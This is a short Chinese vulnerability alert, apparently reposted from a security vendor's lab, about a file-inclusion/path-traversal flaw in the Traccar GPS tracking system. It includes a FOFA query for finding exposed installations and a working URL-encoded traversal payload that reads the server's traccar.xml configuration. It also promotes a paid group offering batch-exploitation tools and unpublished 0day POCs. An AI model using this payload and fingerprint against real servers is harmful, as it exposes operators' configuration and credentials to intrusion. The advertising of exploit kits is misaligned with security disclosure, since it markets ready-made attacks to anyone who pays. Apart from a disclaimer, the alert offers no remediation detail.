文章总结： 本文披露了TraccarGPS跟踪建站系统存在的文件包含漏洞。该漏洞基于Java环境，攻击者可通过构造特定的路径遍历Payload读取服务器敏感文件如traccar.xml。文中提供了FOFA指纹查询语句及具体的POC验证方法，同时包含了部分安全圈子推广内容。建议相关用户尽快排查并修补漏洞以防御信息泄露风险。 综合评分： 60 文章分类： 漏洞预警,漏洞分析,漏洞POC,WEB安全,软文广告

【漏洞预警】Traccar GPS 跟踪建站系统 文件包含漏洞

by 融云安全-cas

融云攻防实验室

2025年12月24日 15:47 江西

0x01 阅读须知

融云安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！

0x02 漏洞描述

Traccar 是由美国 Traccar 公司开发的 GPS 跟踪建站系统，基于 Java 技术构建，核心提供 GPS 跟踪相关功能。该软件兼容性极强，支持超过 170 种 GPS 通信协议与 1500 余款不同型号的 GPS 跟踪设备，可与各类主流 SQL 数据库系统适配，同时配备了简洁易用的 REST API 接口。

0x03 漏洞复现

fofa：app=”Traccar”

1.POC

/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgram%20Files%5ctraccar%5cconf%5ctraccar.xml

2.nuclei图形化检测工具和poc已公布在星球

最后给兄弟们推荐下圈子，高质量漏洞利用研究，代码审计圈子，每周至少更新三个0Day/Nday及对应漏洞的批量利用工具，团队内部POC，源码分享，星球不定时更新内外网攻防渗透技巧以及最新学习，SRC研究报告等。

【圈子权益】

1，一年至少200+漏洞Poc及对应漏洞批量利用工具

2，各种漏洞利用工具及后续更新，渗透工具、文档资源分享

3，内部漏洞库情报分享（目前已有1000+poc，会每日更新，包括部分未公开0/1day）

圈子目前价格为59元，现在星球有1000+位师傅相信并选择加入我们

0x05 公司简介

江西渝融云安全科技有限公司，2017年发展至今，已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司，是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证，拥有软件著作权十八项；荣获2020年全国工控安全深度行安全攻防对抗赛三等奖；庆祝建党100周年活动信息安全应急保障优秀案例等荣誉……

广告：CNNVD二级和三级申请、续期私聊找我对话，价格便宜童叟无欺！

编制：sm

审核：fjh

审核：Dog

1个1朵5毛钱

天天搬砖的小M

能不能吃顿好的

就看你们的啦

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：融云攻防实验室 by 融云安全-cas《【漏洞预警】Traccar GPS 跟踪建站系统 文件包含漏洞》